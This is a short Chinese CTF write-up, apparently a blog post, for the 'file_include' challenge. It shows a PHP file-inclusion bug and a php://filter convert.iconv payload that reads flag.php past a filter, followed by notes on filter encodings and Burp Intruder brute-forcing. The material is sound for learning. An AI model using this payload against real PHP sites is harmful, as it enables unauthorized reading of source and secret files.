文件包含_file_include

file_include 攻防世界

#题目
<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>
#题解
#对很多内容进行了过滤,使用convert.iconv发现可以使用,因此考虑使用convert.iconv.*来进行爆破,查看被过滤情况

?php://filter/convert.iconv.UCS-4*.UCS-4BE/resource=flag.php

对UCS-4*和UCS-4BE展开爆破,得到flag

当被过滤掉base时,可以考虑使用convert.iconv*进行过滤

read=可写可不写,没写read=/write=默认为read=


php://filter深入

*转换过滤器
1.convert.base64-encode()
	将数据流进行base64编码或解码
2.convert.quoted-printable-encode
	对数据进行编码和解码,非可打印的 ASCII 字符(或超出范围的字符)会被编码为 =XX  XX 为十六进制值
3.convert.iconv.*	
	将字符串按要求的字符编码来转换,格式为:
	convert.iconv.<input-encoding>.<output-encoding>
	支持的编码有:
	UCS-4*
	UCS-4BE
	UCS-4LE*
	UCS-2
	UCS-2BE
	UCS-2LE
	UTF-32*
	UTF-32BE*
	UTF-32LE*
	UTF-16*
	UTF-16BE*
	UTF-16LE*
	UTF-7
	UTF7-IMAP
	UTF-8*
	ASCII*

burp Intueder

在爆破时,可以选择使用clusterbomb攻击方式来进行交叉爆破,如字典为16个,则会访问256次

posted @ 2025-09-04 21:52  lieer  阅读(3)  评论(0)    收藏  举报